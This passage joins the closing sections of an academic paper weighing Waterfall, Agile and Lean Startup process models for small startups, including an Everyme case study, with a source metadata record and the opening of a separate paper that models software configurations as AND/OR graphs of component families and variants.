and goal for the startup but also a clean software development structure through the use of stages. The Waterfall model also puts a huge emphasis on customer specification analysis, the first step in the model, and the design structure of the software even before the team starts writing code. If done correctly, this can reduce both cost and time in the software development phase as it minimizes the time and effort wasted on writing code that does not meet customer specifications or constantly refactoring because of bad code design. Lastly, the Waterfall model may improve the overall quality of software since flaws in the design and misunderstanding of specifications are handled in the first two steps before the code is written rather than trying to catch those mistakes in the testing stage. Furthermore, since all specifications and design architectures are properly documented after the first two stages, communication time between team members can be greatly reduced. However, since this model relies on the customer specifications being clearly defined in step one, the specification documents created in the first step may become outdated if the customer changes his mind. In startups, the vision and the scope of the product are usually not fully formed and thus customer specifications may change drastically from one day to another. Since the phases of the Waterfall model are built on top of each other such that the design phase follows the specifications defined in step one and the implementation stage depends on the design structure, a lot of time may be wasted if specifications change. This problem is amplified especially in startups because their scope tends to change constantly to adapt to the needs of the customer (or the market) and the need to refine their product. As a result, the cost and time may increase drastically in some cases. Therefore, unless the specifications are clearly defined and unchanging, which is rare in a startup, the Waterfall model may be more detrimental than beneficial to a small scale tech startup. VI. AGILE Agile methods are a reaction and a proposed solution to traditional methodologies like the Waterfall model that acknowledge “the need for an alternative to documentation driven, heavyweight software development processes” [8]. In fact, according to Cockburn and Highsmith, Agile software development does not necessarily introduce new practices but is the “recognition of people as the primary drivers of project success, coupled with an intense focus on effectiveness and maneuverability” [7]. At its core, the Agile methodology focuses on incremental and iterative development similar to the spiral model. It aims to avoid detailing and defining the entire project at the beginning like the Waterfall model, but instead to plan out and deliver small parts of the project at a time. The methodology is similar to having small loops of the Waterfall model for each feature in the software. The development process starts with the most basic set of deliverables, followed by planning, implementing and testing the next set of features in subsequent iterations. The purpose of this development process is to increase the agility of the development team, by minimizing the time and cost wasted if the customer decides to change his mind. According to Cohen, Lindvall and Costa, being Agile involves more than simply following guidelines that are supposed to make a project Agile” [8]. Andrea Branca also states that some “processes may look Agile, but they won’t feel Agile” [6]. However, there are some methodologies and processes with such a great emphasis on Agile beliefs that they can be considered the core of Agile methodology and have been widely adopted by top companies in the world. This paper will now explore a few of these Agile methodologies and discuss their effectiveness in a small scale startup. A. Scrum Scrum, first introduced by Ken Schwaber in 1996, is a widely used Agile methodology that focuses on developing software in short iterations known as sprints. The process consists of the following stages: Pre-sprint planning - Features and functionalities are selected from a backlog, and a collection of features are planned and then prioritized to be completed in the next sprint. Sprint - The team members choose the features they want to work on and begin development. Scrum meetings are held daily, every morning, to aid communication between developers and product managers. A sprint usually last between one to six weeks. Post-sprint meeting - In this meeting, the team analyzes the progress in the past sprint. In the perspective of a small startup, this process provides a couple of benefits. The enforced daily meetings can improve communication between team members. This can not only decrease the time and cost due to possible miscommunication otherwise, but can also improve the quality of software since software can be better designed when each member understands the overall scope of the project and how others are implementing certain parts. Since the overall structure of the software changes much faster in a startup than in a larger company, it is necessary to keep everyone updated in order to achieve good quality of software. On the other hand, the pre-sprint planning helps the team narrow down their to-do list and focus on the immediate goal. This is particularly important to startups because the final product is not fully defined and thus it is easy for developers to fall into the trap of developing too many features instead of concentrating on the main features. Therefore, by imposing a constraint of time with short iterations, the process helps the team focus on its goal and deliver the necessary features. However, although a constraint of time in Scrum and Agile can narrow the focus and discourage startups from implementing unnecessary features, some may argue that this process harms the scope of the project and limits the creativity that is important in a startup. Iterative development of prioritized features with a time constraint discourages the development team from exploring different ways to implement a certain feature that may perhaps be more efficient or provide more value to the project. Since it is difficult for startups to break into an existing market, innovative designs and implementation of features are particularly important in determining the success of a startup. Therefore, a startup must consider the tradeoffs of scope and creativity to time and cost when thinking about adopting a more focused and iterative development process. B. Extreme Programming Extreme Programming is another methodology that encompasses the core concepts of Agile development similar to Scrum. In “Extreme Programming Explained: Embrace Change”, Beck outlined the 12 rules of Extreme Programming [3]. In addition to the rules mentioned in Scrum, like the focus on pre-iteration planning, short releases and simple design, Extreme Programming also encourages other Agile practices. Extreme Programming encourages test-driven development and suggests that the developers write acceptance test for their code before they implement the features. The benefits of test-driven development are clear: writing test cases before implementing a feature can ensure the feature fulfills the specifications that were set out originally. Furthermore, the quality of software is also improved not only because of the decrease in bugs and faults in the software but also because of improved maintainability of the software. With tests written for all the features implemented, it is easy to tell whether changing a section of the code is going to affect another section simply by running the test suite. Therefore, test-driven development can definitely increase the quality of software and decrease the cost and time wasted on debugging afterwards. However, do the same benefits apply to a small scale startup? A small scale startup has a limited number of developers, a list of features that is probably being changed and refined constantly and a limited amount of time and money. Is it worth spending time writing comprehensive test cases for every feature before implementing it? It is very possible that by the time the tests were written, the customer has changed his mind and the tests will be rendered useless. On the other hand, if the same amount of time has been spent on developing the feature, the code may be recycled for another feature. Furthermore, in many cases, the customer may request a few features as prototypes to test out some ideas in order to make up his mind. When that happens, it does not seem reasonable to write out all the tests but instead it would be preferable to implement those prototypes as fast as possible in order to speed up the design and decision process. Lastly, a small scale startup that has not obtained much funding will probably have a short runway, and thus a limited amount of time and money. The priority in this case will be to create an MVP, or minimal viable product, which may lack in quality but is at least functional enough to pitch to and show investors. Overall, the test-driven development aspect of Agile is a tradeoff between cost and time to achieve improved quality of software. Although quality is important, as startups usually only have a few chances to make a strong impression on investors and users in the market, cost and time may be a larger deciding factor. Once the startup runs out of funding or if a close competitor releases a similar product, a higher quality of half a product isn’t going to help much. The Extreme Programming process also places emphasis on pair programming, a process that requires two developers to write code together on the same machine. This is often used with the purpose of creating better written code, increasing discipline and emphasizing collective code ownership [13]. The idea is that paired programmers are less likely to take longer breaks and are more likely to “do the right thing” under someone else’s watch. Pair programming can also allow the programmers to bounce ideas off each other and thus be less likely to overthink a simple problem or to reach a programmer’s block. It also encourages collective code ownership by increasing a programmer’s knowledge of the code base through pairing with different programmers. The benefits listed above can again increase quality of the software at the cost of money and time. In addition, pair programming usually provides a good morale boost within the team and is often used in large companies due to the benefits it provides to the project management of large teams. However, for a small scale startup with fewer than eight employees, the benefits of pair programming may be limited. As discussed earlier, small startups have a tight constraint of time and money, and thus improving quality with twice the cost (of hiring two developers) may be out of scope for a small startup. Furthermore, since the team is very small, each developer is probably responsible writing code in different areas of the code base, and thus already reaps the benefits of collective code ownership advertised by pair programming. A common system of assessing progress and defining features in Agile methods such as Scrum and Extreme Programming is the use of user stories, velocity and backlogs [19]. A user story is a description of a feature in everyday language that can be easily understood by non-technical persons. For example, a user story can be “As a user, I want to...” be able to log into the site with my Facebook account”. Each user story can then be assigned points based on the time it takes for the feature to be implemented as estimated by the developer. The velocity of the team can be calculated as “the sum of the time estimated of user stories implemented within an iteration/release” [11], in other words, the sum of the points given to the user stories. By describing features in a non-technical language, the system encourages the integration of business and marketing to the implementation of the product which can improve the usability of the software. The use of velocity to measure the team’s progress can also provide a quantitative assessment to the project manager and can help estimate the features that can be delivered before a certain deadline. Other than velocity, there are other metrics that are used to assess a team’s performance, such as defect rates, defined as the number of defects made by a team and by each programmer during each iteration. However, are these metrics that important to a small scale startup? From the above discussion, we can definitely note the importance of the Agile process and methodologies in software development. As a good “tool for project management”, it proves to be beneficial to improve quality and decrease time and cost of the project while keeping it in scope and focused in projects with a large team. The Agile methodology is a well established system that can also act as a guide and provide a good structure for startups that do not have a clear plan for managing their team and analyzing the progress. However, we remain skeptical of whether small scale startups can actually reap the full benefits of following a rigorous Agile process. Agile may be popular in the startup world, but startups that are in a much earlier stage, with much fewer employees, are beginning to favor a relatively new process model called Lean Startup. Perhaps this new way of project management is more lightweight and better suited to the bootstrapping style of these early small scale startups. VII. LEAN STARTUP Lean Startup, a term coined by Eric Ries [21], is a process model that “builds on many previous management and product development ideas, including lean manufacturing, design thinking, customer development, and agile development”. Although the Lean Startup process does involve some core principles of Agile methodologies discussed earlier, the main difference between Lean Startup and Agile is that Lean eliminates anything that is not absolutely necessary, including possibly team meetings, tasks and documentation. It is important to note that Agile and Lean are not mutually exclusive, but rather largely complementary. In “The Lean Startup” [21], Ries emphasizes the importance of learning in the process. Lean Startup focuses on learning how to build a sustainable business, whether to pivot or preserve, and entrepreneurial management. According to Ries, it is important to distinguish whether the outcome of a startup’s effort is value-creating or wasteful. For example, since customer specifications change all the time, learning to gain important insights about customers contains much more value in the long run than focusing on making the product better by adding features and fixing bugs based on what the customers want at the time. Ries argues that although Agile development methodologies were designed to eliminate waste by decreasing the duration of feedback loops, a lot of waste still occurs because of mistaken assumptions. Agile as well as the “Lean thinking” in lean manufacturing defines value as effort that “[provides] benefit to the customer” [21]. However, who the customer is, what the customer wants and what the customer may find valuable are unknown and subject to change. Therefore Ries proposes that the value of a startup should arise from the effort spent on learning about “what creates value for customers”. The majority of Agile methodologies include techniques to aid in project management and progress analysis, such as the use of user stories, backlog and velocity, and also on finding the most efficient way to build features and make corrections that satisfy the customer’s current decisions. On the other hand, Lean Startup focuses on validated learning as the metric in measuring progress and value. For example, the Agile methodologies employ acceptance testing, tests that are based on customer specifications, as the testing strategy while Lean Startup advertises the use of split testing (an experimental approach that tests two variations of the software). The Lean Startup methodology believes that a startup only assumes who their customer is, but does not know exactly what the customer wants and what their final product should be. Through using validated learning methods such as split testing, the startup is able to learn more about the customer and be able to make decisions, learn and improve their product in a way that is meaningful. Similarly, the release log and backlogs in Agile build toward a release plan while Lean Startup works towards deploying a minimal viable product. It is this continuous deployment and validation that provide startups with knowledge of their market and customers. Although focusing on building a minimal viable product may sacrifice the quality of software in the short term, the startup benefits from the decrease in overall development time and cost. Through continuous deployment and validation, startups are able to push out products very quickly and continue to improve their quality in the longer run. Furthermore, the scope and quality of their software ultimately benefits in the long run due to the focus on learning and customers. Ultimately, Agile methodologies tend to target the actual development of software while Lean Startup is more beneficial to business development and product management. In a small scale startup, perhaps the benefits gained by improving business and product development are more important in the long run than improving the actual process to develop the software behind it. In the next section, we will take a look at a typical small scale startup that has employed a mix of both Agile and Lean process models to observe both process models in practice. VIII. CASE STUDY: EVERYME In the Summer of 2012, the first author had the opportunity to intern at Everyme, a Y-Combinator startup that was building a private social network app for friends, families and partners. At the time of employment, they had a team of five, which falls under our definition of a small scale startup. The team consisted of a designer, an iPhone developer, an Android developer and a web developer (who is also a co-founder); the CEO also worked on iOS development from time to time. This is a typical setup of a small tech startup, with very small teams of one to two working on their part. At the time of the internship, Everyme was using a process model containing the elements of both Lean Startup and Agile. The CTO of the company, Vibhu Norby [16], had also described the effects of their process model on the management level during an interview. From a developer’s perspective, the model was fairly simple. Since everyone was basically “in their own department”, they worked at their own pace and prioritized work in their own way. Occasionally, integration across the mobile and web platforms was needed and tasks needed to be reprioritized. There was a five minute stand-up meeting once every few days to go over what each person had done previously, what he would do next and whether he would need anything from anyone. For example, an Android developer may ask the designer for templates. This provided everyone with a rough idea of company’s progress and whether they had to re-prioritize their list of tasks. This is similar to the Agile process Scrum’s pre-sprint stand-up meeting, but more casual and without coming up with a list of tasks that are required to be completed by the week (or sprint). Everyme did not employ a backlog system but instead had an issue list for people to assign certain tasks to each other. This gave flexibility to each developer to work on something he was interested in and provided the developers with more room for innovative implementations and features that may not necessarily be in the backlog. This is very similar to the Lean Startup ideology. However, Norby argued that this process did bring some disadvantages. Without an Agile-esque backlog or a required list of tasks that needed to be completed by a certain time, there were times when the developers were unclear of what to do. When a huge decision or possible pivot was being discussed and formed, which was more often in a small startup than in a large company, the direction of the project became unclear and thus time and cost were wasted as developers were unsure of what they need to do. Everyme also used a Lean Startup approach when it came to assessing progress of the team and company. Instead of using the difficulty and number of features done per week similar to velocity in Agile, Everyme used a validated approach, based on the number of downloads, the reviews and feedback they received and so on. Milestones and inflection points were also used to observe the general progress of the company. It was found to be much more effective as a motivational tool to set up inflection points, such as a release date, or important dates, such as meetings with investors that required the product to be done. People performed better under constraints. However, Lean Startup’s validated approach may only be beneficial up to a certain point. Norby noted that “progress measured by downloads, as done in Lean, may not be effective in the long run. You can have up to millions of downloads, but that doesn’t tell you which direction to go next.” When asked about whether they have tried adopting a more rigorous Agile methodology, Norby described that they have tried using Sprint.ly [23], an online system that uses the Scrum process. Similar to Scrum, it defines tasks as user stories with a certain difficulty. These tasks are then stored in the backlog and taken out when a developer decides to implement it. However, implementing Sprint.ly into their current process model was too costly and time consuming. For a small scale startup like Everyme, everyone has his own process model and work schedule. Employees have their to-do list in their mind and they all know roughly how long it will take. Spending time writing it down, modifying it and crossing it off later is just too unnecessary. Norby went on to describe how they had tried test-driven development, another important aspect of the Agile process, but found that it was also too time consuming. “We would spend a lot of time writing test cases for features that may end up not being implemented, because you know, specifications change all the time.” For small scale tech startups similar to Everyme, we can see that although the Agile principles are important, they may be too costly to implement. “We don’t even have a project manager... it takes too much effort for us to take time out of our schedule to manage this”. With a small enough team that functions well without management, it may seem unnecessary to insist upon a strict process model. Therefore, a combination of the Lean Startup approach and Agile principles may mitigate the problem by having less of a structured process but still provides the benefits that Agile proposes. IX. RELATED WORK There has been much research in the past that considered the suitability of Agile processes to various software organizations, but this prior work does not consider the challenges of small scale startups in particular [1][20] and/or does not address the impact of the process on the metrics of cost, scope, time, and quality [5][22], as we do here. Others have assessed various aspects of Agile software development (e.g., pair programming [15] or test-driven development [4]) but have not related the overall effect in a small startup environment. Additionally, some researchers have investigated the combinations of Lean Startup and Agile [25], and the tradeoffs between Agile and traditional approaches [18], while others have compared the two when used in a startup [10], but we believe that we are the first to specifically address the issues related to Agile processes and a small scale startup company of eight or fewer employees. X. CONCLUSION We have discussed process models such as the Waterfall model, the Agile methodologies, Extreme Programming and Scrum, and Lean Startup and their effects on small scale tech startups. We also looked at the effects of these process models on a startup in practice. Through our discussion, we concluded that different process models have different tradeoffs between the four metrics – cost, time, quality and scope – and are most beneficial when employed during the different stages of a company. While the Waterfall model is effective for companies with a solid,unchanging end goal, it performs badly with startups that are unsure of their final products. The model can help companies decrease the cost and time of development by defining the specifications and design architectures at the beginning but suffers when specifications change drastically. This may be beneficial to large companies with unchanging goals, but becomes ineffective for startups, which are likely to be unsure of their end goals and may change their specifications constantly. The Agile methodologies attempt to solve this issue by decreasing the feedback loops by integrating customer feedback to the development process. Tasks are translated into user stories, a format understood by business persons, in order to aid communications between business and development. Unlike the Waterfall model, customer feedback can be easily integrated into the development process and the startup is able to make changes easily with minimal waste of time and money. A rigorous, purely Agile process model can no doubt increase the quality of the software, but at a cost of extra time and money required to manage and maintain the system. At a hundred person startup or even a large established company, the cost of maintaining such a system is fixed and spread out, making the tradeoff of quality against time and cost worth the implementation of an Agile process model. On the other hand, the fixed cost and time of implementing a similar system in a small scale startup may be too high for the quality gained. The Lean Startup model largely complements the Agile methodologies but argues that the Agile way of using velocity, the difficulty and number of features implemented in each iteration, is a poor indicator of progress and suggests the use of validated learning as a process model to determine the progress of a company. The Lean Startup methodology observes the excessive amount of process in the Agile model and attempts to mitigate the problem by decreasing the number of rigorous practices in a startup to strike a balance between quality, time and cost that is suitable for a small scale startup. In a small scale startup at Everyme, we saw that although the Agile methodology does provide a good process for managing teams of large sizes, a small scale startup may not experience the same problems as a large company and thus may not reap the full benefits of adopting an Agile methodology. While it is important to understand the Agile principles so the team does not fall into the trap of premature optimization and planning similar to the Waterfall process, a rigorous process may be too costly for a startup. Many Agile practices, such as test-driven development and pair programming, provide increased quality of software at an expense of cost and time. Furthermore, a heavy process model may in fact limit the scope of the project by discouraging innovation through a strict backlog or to-do list. Thus, when considering whether a rigorous Agile methodology is the best development strategy for a startup, we have to consider the different tradeoffs of cost, time, quality and scope. For a small scale startup containing fewer than eight members, a rigorous, purely Agile methodology may not provide enough benefits to outweigh the cost and time put into implementing and managing the process model. It is definitely important to understand Agile principles but perhaps following the Agile methodology strictly is out of scope for a small startup. Thus, to answer the question, “Is a rigorous agile methodology the best development strategy for small scale tech startups?”, we have to determine the ultimate goal of the startup. In general, the Agile process model is most beneficial to improving the process of software development while Lean Startup is most beneficial to business and product development. A startup that is developing software for another company may already have a clearly defined product and does not have to worry about business development. In such a case, a rigorous, purely Agile approach will be most beneficial. On the other hand, if the startup is in charge of the business and product development, or when the software plays a huge part in the product, a hybrid of Agile and Lean may provide the most benefits in terms of the four metrics. Ultimately, a process model should be transparent enough to allow the team to know how the company is doing but at the same time not burden the developers and allow them to concentrate on what they do best. In a startup, the developers tend to be more invested and interested at the product that they do not require a strict to-do list or motivational benefits from the Agile methods. A possible area for future research is the analysis of the effects of process models on mobile-centric startups. Practices such as continuous integration in Agile or continuous deployment in Lean Startup become nearly impossible in a startup with heavy focus on mobile development. Since iOS apps have to get approved by Apple, the deployment process usually takes around a week. Even then, a startup cannot force its customers to upgrade to the newer version straight away, unlike web applications. Then, the process models that focus heavily on the ability to integrate and deploy continuously or split testing may not be effective for mobile-centric startups. In this new era in which mobile development is becoming more and more popular, perhaps a new process model is required. ACKNOWLEDGMENT The authors would like to thank Kristin Fergis for her initial investigation into this topic, and Vibhu Norby for providing insight into Everyme’s organization and processes. REFERENCES References:
{"Source-Url": "http://repository.upenn.edu/cgi/viewcontent.cgi?article=2025&context=cis_reports", "len_cl100k_base": 8449, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 34301, "total-output-tokens": 10339, "length": "2e13", "weborganizer": {"__label__adult": 0.0004069805145263672, "__label__art_design": 0.0003247261047363281, "__label__crime_law": 0.00029850006103515625, "__label__education_jobs": 0.0014514923095703125, "__label__entertainment": 4.8160552978515625e-05, "__label__fashion_beauty": 0.0001825094223022461, "__label__finance_business": 0.0006394386291503906, "__label__food_dining": 0.0004606246948242187, "__label__games": 0.0004150867462158203, "__label__hardware": 0.0005135536193847656, "__label__health": 0.0004074573516845703, "__label__history": 0.00019884109497070312, "__label__home_hobbies": 7.915496826171875e-05, "__label__industrial": 0.0003132820129394531, "__label__literature": 0.0002244710922241211, "__label__politics": 0.00030612945556640625, "__label__religion": 0.00037932395935058594, "__label__science_tech": 0.0018911361694335935, "__label__social_life": 8.767843246459961e-05, "__label__software": 0.00298309326171875, "__label__software_dev": 0.9873046875, "__label__sports_fitness": 0.00039505958557128906, "__label__transportation": 0.000476837158203125, "__label__travel": 0.00021922588348388672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 48930, 0.02462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 48930, 0.32072]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 48930, 0.9494]], "google_gemma-3-12b-it_contains_pii": [[0, 1043, false], [1043, 2954, null], [2954, 8269, null], [8269, 13889, null], [13889, 19723, null], [19723, 26371, null], [26371, 32665, null], [32665, 38877, null], [38877, 45252, null], [45252, 48930, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1043, true], [1043, 2954, null], [2954, 8269, null], [8269, 13889, null], [13889, 19723, null], [19723, 26371, null], [26371, 32665, null], [32665, 38877, null], [38877, 45252, null], [45252, 48930, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 48930, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 48930, null]], "pdf_page_numbers": [[0, 1043, 1], [1043, 2954, 2], [2954, 8269, 3], [8269, 13889, 4], [13889, 19723, 5], [19723, 26371, 6], [26371, 32665, 7], [32665, 38877, 8], [38877, 45252, 9], [45252, 48930, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 48930, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
223bae78b80cab7c9fa397c413e76493fff64ba5
AN APPROACH TO AUTOMATED BUILDING OF SOFTWARE SYSTEM CONFIGURATIONS PAVOL NÁVRAT and MÁRIA BIELIKOVÁ Slovak Technical University, Dept. of Computer Science and Engineering, Ilkovičova 3, 812 19 Bratislava, Slovakia E-mail: {navrat,bielikova}@elf.stuba.sk Tel.: (+ 42 7) 791 395 Fax: (+ 42 7) 720 415 Abstract In the paper, we concentrate on a method for building a software configuration. We build configurations by defining the system’s model first. We have introduced a model of a software system as an AND/OR-type graph with two kinds of nodes: families and variants. Models serve as useful abstractions simplifying the process of configuration building. Being essentially a graph search, it is inevitable to have a method for selecting a proper version. Our approach offers to a software engineer a framework for specifying various heuristics describing which versions are to be preferred. In our method, the search is further reduced by introducing the concepts of generic and bound configurations and dividing the fundamental steps of our method. Keywords: Software configuration management, version control, selection controlled by heuristics. 1 Introduction One of the important problems in software development and management is how to build configurations of software systems. The problem is a consequence of the fact that software is complex both as a product and as a process of its development. Software is built as a system consisting of many components which are naturally simpler than the whole, reducing the complexity in that way. Also the process of development is gradual, involving many more elementary, and therefore simpler steps. In those steps, very often only one particular component is transformed into a modified one, implementing nevertheless still essentially the same concept. Such transformations of components give rise to their versions. Consequently, we have a huge space of possible software system configurations viewed as sets of components satisfying requirements. The requirements can vary considerably, e.g. we can require a configuration intended as a product to be delivered to a customer, or a configuration intended as a document to resume development with. The process of building a software system configuration is itself a complex one. Bookkeeping of attributes and relations of thousands of objects alone, not to speak of the frequency of their changes is a task which can best be handled by a computer. A support from a computer should further be sought in freeing the software engineer from the burden of a too detailed configuration specification. Instead, software engineer should have means to write higher level requirements which specify the configuration implicitly. Ultimately, this leads to employing relevant knowledge which would be represented explicitly and used by the computer. This can be considered an approach to automating the above mentioned part of the software engineering. Any progress in automating the software engineering is hard to imagine without further formalisation in describing the objects and processes, and indeed there is much research endeavour oriented towards this aim, cf. e.g. [9]. More specifically, there have been various efforts to automate support to building software configuration. However, some of them do not take into account the existence of versions, e.g. [7, 27], or if they do, they neglect the difference between variants and revisions, e.g. [24, 18]. Some, on the other hand, make use of the difference between variants and revisions to increase efficiency of the building process, especially in version selection, e.g. [11, 13, 5, 12, 19, 26, 23]. An interesting view on the space of versions with revisions and variants evolving along orthogonal dimensions is presented in [21, 29]. An important aspect is reusability of the created configuration, as well as of its description and of the model of the software system, as has been pointed at by e.g., [1] in developing a system called ADELE, cf. [6]. The work influenced also our approach to the problem. The outline of the rest of the paper is as follows. We present our approach to mo- delling software systems in section 2. We stress our interpretation of the notion of variant and give a formal description of the model. We briefly comment on differences between ours and related works. In section 3, we describe the way we use for specifying a configuration. Again, we briefly comment on the points which are new in our approach comparing to related works. The proposed method for building a configuration is presented in section 4. Next, we report on experimental evaluation of our method, including description of the tests performed, in section 5. Section 6 summarizes the points in our approach that are new when compared to related works. It makes also conclusions for the future work. 2 Modelling a Software System Solving various problems related to building software system configurations in processes of software development and maintenance requires describing the actual software system in the simplest possible way, but still sufficiently rich to reflect the principal relations and properties which are decisive in the building process. Generally, various kinds of graphs are being used to model software systems. A quite natural way to represent software systems is by means of a tree [22]. It does not, however, allow to describe the more complex aspects of such systems. An acyclic oriented graph is the next more suitable choice [27, 8]. Tichy [24] and later Estublier [6] have presented a model based on AND/OR graphs. An important aspect stressed also by the latter work is reusability of the created configuration. We attempt to describe a software system with the specific purpose in mind, i.e. to be used during development and maintenance, and specifically in building the software system configuration. Therefore, our model encompasses those parts of the system and those relations among them which are important for building a configuration. We find the AND/OR graphs suitable in supporting the process of software system configuration building [3]. When attempting to identify basic parts of the system model, it is instructive to bear in mind that a software system is being created in a development process which can be viewed as a sequence of transformations. Because the initial specification of the system does not and should not include details of the solution, the overall orientation of the transformations is from abstract towards concrete. However, this does not mean that each particular transformation and especially when applied to a particular subsystem or component is a concretization. In fact, there are involved abstracting, generalizing, and specializing transformations as well. Let us mention importance of such kinds of transformations in software reuse, reverse engineering, etc. From among all the possible kinds of transformations, it is important to distinguish all those which correspond to the notion of software component version. Creating a software component version can be done in one of two possible ways. First, versions are created to represent alternative solutions of the same specification. They differ in some attributes. Such ‘parallel’ versions, or variants, are frequently result of different specializations. Second, versions are created to represent improvements of previous ones, or as modifications caused by error correction, functionality enhancement, and/or adaptation to changes in environment. Such ‘serial’ versions, or revisions, are frequently result of concretizations of the same variant. A family of software components comprises all components which are versions of one another. When defining a model of a software system, relations between software components should be considered. They can be of two kinds: - relations expressing the system’s architecture, concerned especially with the functionality of the components and structure of the system, such as depends_on, specifies, uses, - relations expressing certain aspects of the system’s development process, with important consequences especially for the version management, such as is_variant, has_revision, which we shall commonly refer to as development-induced relations. Let us formulate the notions more formally now. Let $COMPONENT_S$ be a set of components of a software system $S$. Then a binary relation $is_version_S \subseteq COMPONENT_S \times COMPONENT_S$ is given as the reflexive and transitive closure of another binary relation which is defined by elementary transformations describing such modifications of software components that they can still be considered to be expressing essentially the same concept. Relation $is_version_S$ is reflexive, symmetric and transitive. A set of all equivalence classes induced by the $is_version_S$ relation is denoted $FAMILY_S$ and called a set of families of software components of the software system $S$. An element of $FAMILY_S$ is called a family of software components. Next, we focus our attention to the structure of a software component itself. We define which kinds of properties a component has. Based on that, we can define variants as sets of those components which share certain attributes. We call a software component a quintuple $c_S$: $$c_S = \{ArchRel, FunAttr, CompAttr, Constr, Realis\},$$ where $ArchRel$ is a set of pairs consisting of a name $RelationId$ of an architectural relation and a name $FamilyId$ of a family (it represents relations expressing the system’s architecture), $FunAttr$ is a set of functional attributes (the name together with the value), $CompAttr$ is a set of other attributes of that component (i.e. the attributes which are considered to revisions), $Constr$ is an expression for the constraint (in the sense of combining components to configurations), and Real is the actual text of the component. For example, let us consider a software component c1, for which there exists an architectural relation contains with a family of software components INIT, and a relation has_document with a family DOCUM: \[ c1 = (\{(\text{contains}, \text{INIT}), (\text{has\_document}, \text{DOCUM})\}, \text{architecture relations}) \] \[ \{(\text{phase}, \text{implementation}), (\text{operating\_system}, \text{DOS}), \text{functional attributes}) \] \[ (\text{prog\_language}, \text{C}), (\text{user\_interface}, \text{graphic}), \text{functional attributes}) \] \[ (\text{type\_of\_problem}, \text{diagnose}), \text{functional attributes}) \] \[ (\text{author}, \text{peter}), (\text{date}, 95\_01\_15), (\text{status}, \text{tested}), \text{other attributes}) \] \[ (\text{parameters} = \text{ordered}) \Rightarrow (\text{system\_ver} = \text{DOS\_6\_2}), \text{constraint}) \] \[ #\text{define...} \] \[ \text{C language} \] In order to describe variants, we define a binary relation is_variant which determines a set of software components with the same architectural relations, functional attributes and constraints within a given family. The binary relation is_variant \(S \subseteq \text{COMPONENT}_S \times \text{COMPONENT}_S\) is defined by: \[ x \text{ is\_variant}_S y \Leftrightarrow x \text{ is\_version}_S y \land x.\text{ArchRel} = y.\text{ArchRel} \land x.\text{FunAttr} = y.\text{FunAttr} \land x.\text{Const} = y.\text{Const} \] It can be easily seen that the relation is_variant is an equivalence. A set of all equivalence classes in the relation is_variant will be denoted by VARIANT\(_S\) and called a set of variants of a software system S. An element of the set VARIANT\(_S\) is called a variant. Variants are important to simplify management of software component versions in selecting a revision of some component, or in building a configuration. We can treat a whole group of components in a uniform way due to the fact that all of them have the relevant properties defined as equal. As an example, let us present a part of software system which includes versions of (some of) its components. The example is taken from the software system KEX [17]. The system elements are shown in Figure 1 along with architectural relations between them. In Figure 1, the elements are organized in a hierarchy. Families of software components comprise variants and variants comprise revisions. Architectural relations are defined at the level of variants (they are the same for all revisions within a variant) between a variant and a family of software components. They are identified by names: EVAL, INIT, ACTIONS, INFER, DOCUM, INTERR, MANAGER. Each family includes several software components, e.g. the family EVAL includes three sets of components (i.e. variants) which include in turn nine revisions. Thus, the family EVAL includes nine software components. The concepts introduced above will allow us to formulate a model of a software system which would support a process of configuration building. Our approach is based on an assumption that families of software components, variants and revisions are the basic entities involved in version management. All the relations between these entities can be grouped into architectural relations and development-induced relations. Development-induced relations determine membership of a variant in a family of components, and membership of a revision in a variant. Architectural relations express the system’s architecture, especially the functionality of the components and the structure of the system. They must be defined explicitly at the level of variants and must be the same for all revisions included in a given variant. Particularly this assumption is very important, because it allows us to simplify the situation and to formulate a model of a software system which comprises only two kinds of elements: families and variants. From the point of view of a family, a model should represent families and variants included in them. Links from a family to all variants are defined by relation $\text{has_variant}_s \subseteq \text{FAMILY}_s \times \text{VARIANT}_s$: $x \text{ has_variant}_s y \iff y \subseteq x$. From the point of view of a variant, the model should represent links to all those families which are referred to in that variant (links are defined by architectural relations). When building a configuration, for each family already included in a configuration there must be selected precisely one variant. For each variant already included in a configuration, there must be included all the families related by architectural relations to that variant. Taking into account that a software component is determined completely only after a revision has been selected, a resulting configuration is built by selecting... precisely one revision for each selected variant. Our method of modelling a software system $S$ is to describe it by an oriented graph $M_S = (N, E)$, with nodes representing families and variants in such a way that these two kinds of nodes alternate on every path. Any element of $E$, $(e_1, e_2) \in E$, called an edge, is of one from among the two mutually exclusive kinds. Either $e_1 \in VARIANT_S$ (a set of variants of a software system $S$), $e_2 \in F_S$ (a set of family names of a software system $S$). In this case, the node $e_1$ (variant) is called the $A$-node. Or $e_1 \in F_S, e_2 \in VARIANT_S$. In this case, the node $e_1$ (family) is called the $O$-node. Such graphs are denoted as $A/O$ graphs. Revisions are covered in the model through $A$-nodes which represents variants, i.e. sets of revisions. The usual interpretation is that $A$-nodes are origins of edges leading to nodes, all of which must be considered provided the $A$-node is under consideration (logical AND). Similarly, $O$-nodes are origins of edges leading to nodes, from among which exactly one must be considered provided the $O$-node is under consideration (logical OR). The example software system depicted in 